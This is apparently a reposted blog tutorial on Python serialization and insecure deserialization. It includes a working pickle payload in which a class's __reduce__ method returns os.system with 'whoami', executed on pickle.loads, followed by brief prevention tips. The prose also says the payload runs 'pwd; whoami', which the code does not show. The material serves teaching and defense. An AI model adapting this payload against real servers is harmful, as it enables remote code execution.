Insecure Deserialization — Why it is a vulnerability

3 months ago 41
BOOK THIS SPACE FOR AD
ARTICLE AD

Nanak Singh Khurana

First of all before deserialization, let us understand what is serialization.

Serialization: It is the process in which the data is converted from complex data structures and into byte stream which can be sent and received as a sequential stream of bytes for storage as well as communication.

Now, one question which is asked: can’t we use our normal key-value pairs rather than serializing it?

The answer is yes, we can

But if we use the byte stream it has its own advantages:

Compact Representation: Binary formats are generally more compact than text-based formats like JSON. This can reduce storage requirements and improve performance when reading and writing data.

2. Speed: Binary serialization can be faster than text-based serialization, both in terms of serialization/deserialization speed and I/O operations as they avoid the overhead of encoding and decoding textual representations.

3. Precision: Binary formats can preserve the exact structure and type information of the serialized objects, ensuring that deserialized objects are reconstructed accurately.

4. Complex Data Structures: Binary formats can handle more complex data structures and object graphs, including references and circular dependencies, which can be challenging to represent efficiently in text-based formats.

5. Reduced Exposure: Text-based formats can be easier to manipulate and may expose more information to potential attackers. Binary formats can obscure data representation, making it harder to understand and tamper with serialized data.

Example of Serialization of data in Python:

Note: We will use pickle library of python

# Importing the pickle module, which is used for serializing and deserializing Python objects.
import pickle
# Create a list object
data_list = [1, 2, 3, 4, 5] # Define a list containing some integer elements.

# Serialize the list to a binary format
serialized_list = pickle.dumps(data_list)
# The 'pickle.dumps' function converts the 'data_list' object into a byte stream (binary format).
# This process is called serialization. The resulting byte stream can be stored or transmitted.

print("Serialized List:", serialized_list)
# Print the serialized byte stream. It will look like a sequence of bytes, which is not human-readable.

# Save the serialized list to a file
with open('list.pkl', 'wb') as file:
# Open a file named 'list.pkl' in write-binary mode ('wb').
# The 'with' statement ensures that the file is properly closed after writing.
# Write the serialized byte stream to the file.
# This stores the serialized data on disk, allowing it to be retrieved and deserialized later.
file.write(serialized_list)

Have added comments in the code to explain each and every line.

This gives the below output:

Serialized List: b'\x80\x04\x95\x0f\x00\x00\x00\x00\x00\x00\x00]\x94(K\x01K\x02K\x03K\x04K\x05e.'

In here we serialized the data in bytes.

Now can we do it in JSON? The answer is a yes.

import json
import pickle

# Step 1: Create a Python object (dictionary)
data_dict = {
"name": "Nanak Singh",
"age": 23,
"city": "Delhi"
}

# Step 2: Convert the Python object to a JSON string
json_string = json.dumps(data_dict)
print("JSON String:", json_string)

# Step 3: Serialize the JSON string to a byte stream
byte_stream = pickle.dumps(json_string)
print("Serialized Byte Stream:", byte_stream)

The output of the above code is:

JSON String: {"name": "Nanak Singh", "age": 23, "city": "Delhi"}
Serialized Byte Stream: b'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c3{"name": "Nanak Singh", "age": 23, "city": "Delhi"}\x94.'

Now let us understand what is Deserialization:

It is the process of converting serialized data back into its original structure or format(as per the above examples getting the JSON data or the List back). When data is serialized, it is transformed into a format that can be easily stored or transmitted, such as a byte stream or a string. Deserialization reverses this process, taking the serialized data and reconstructing it into a usable object or data structure within a program.

As per the above JSON example, if I add some more deserialization component to it:

import json
import pickle

# Step 1: Create a Python object (dictionary)
data_dict = {
"name": "Nanak Singh",
"age": 23,
"city": "Delhi"
}

# Step 2: Convert the Python object to a JSON string
json_string = json.dumps(data_dict)
print("JSON String:", json_string)

# Step 3: Serialize the JSON string to a byte stream
byte_stream = pickle.dumps(json_string)
print("Serialized Byte Stream:", byte_stream)

# Deserialization

# Step 4: Deserialize the byte stream back to a JSON string
deserialized_json_string = pickle.loads(byte_stream)
print("Deserialized JSON String:", deserialized_json_string)

# Step 5: Convert the JSON string back to a Python object
deserialized_data_dict = json.loads(deserialized_json_string)
print("Deserialized Data Dictionary:", deserialized_data_dict)

This gives me an output:

JSON String: {"name": "Nanak Singh", "age": 23, "city": "Delhi"}
Serialized Byte Stream: b'\x80\x04\x957\x00\x00\x00\x00\x00\x00\x00\x8c3{"name": "Nanak Singh", "age": 23, "city": "Delhi"}\x94.'
Deserialized JSON String: {"name": "Nanak Singh", "age": 23, "city": "Delhi"}
Deserialized Data Dictionary: {'name': 'Nanak Singh', 'age': 23, 'city': 'Delhi'}

Till now the process looks good, now let us understand what is Insecure Deserialization:

It is a vulnerability that arises when an application deserializes untrusted data without proper validation or sanitization.

Now what cloud happen is attackers could, for example, inject hostile serialized objects into an application, where the victim’s computer would initialize deserialization of the hostile data.Attackers could then change the angle of attack, making insecure deserialization the initial entry point to a victim’s computer.

Let me take an example to explain this:

Step 1: Creating malicious payload

import pickle
import os

# Define a class with a malicious payload
class Malicious:
def __reduce__(self):
# The commands to be executed when deserialized
cmd = "whoami"
return (os.system, (cmd,))

# Create an instance of the malicious class
malicious_object = Malicious()

# Serialize the malicious object
malicious_payload = pickle.dumps(malicious_object)

# Save the payload to a file (simulating sending it to the server)
with open('malicious_payload.pkl', 'wb') as f:
f.write(malicious_payload)

Step 2: Deserializing the Malicious Payload (Simulating the Server)

import pickle

# Read the malicious payload from the file (simulating receiving it from a client)
with open('malicious_payload.pkl', 'rb') as f:
received_payload = f.read()

# Insecurely deserialize the payload
# This will execute the malicious code (showing pwd and whoami)
deserialized_object = pickle.loads(received_payload)

The output of the above is, on the server I am getting my UserID on my terminal

Now let us understand what happened above:

We defined a class named Malicious and a method in it named __reduce__.The __reduce__ method returns a tuple with two elements:The first element is a callable (in this case, os.system).The second element is a tuple containing arguments to be passed to the callable (("whoami")). This command will print the the current user when executed.

2. Then we created malicious_object which is an instance of Malicious class.

3. Serializing the Malicious Object:

The instance is serialized using pickle.dumps(), which converts the object into a byte stream that can be saved or transmitted.The serialized byte stream (payload) is saved to a file named malicious_payload.pkl

Here the Step 1 is over, heading over to Step 2.

The malicious payload is read from the file malicious_payload.pkl into a variable named received_payload. This simulates receiving the payload from an untrusted source (e.g., a client).The pickle.loads() function is used to deserialize the payload. This function reconstructs the original Malicious object from the byte stream.Because the __reduce__ method of the Malicious class was designed to execute the command pwd; whoami, this command is executed during deserialization, printing the current working directory and the current user to the console.

And then boom, on my terminal I got:

Now how to prevent this:

Validate and Sanitize Input: Ensure that the data being deserialized is properly validated and sanitized to prevent malicious payloads.

2. Use Whitelisting: If deserialization is necessary, implement whitelisting to restrict which classes or types can be deserialized.

We can also use Advance Serialization where Karthikeyan Nagaraj has written a great post: https://cyberw1ng.medium.com/serialization-and-deserialization-advanced-concepts-and-best-practices-c6562fce9e4b

Thanks for reading!!!

Lets Connect: https://www.linkedin.com/in/nanak-singh-khurana/

Read Entire Article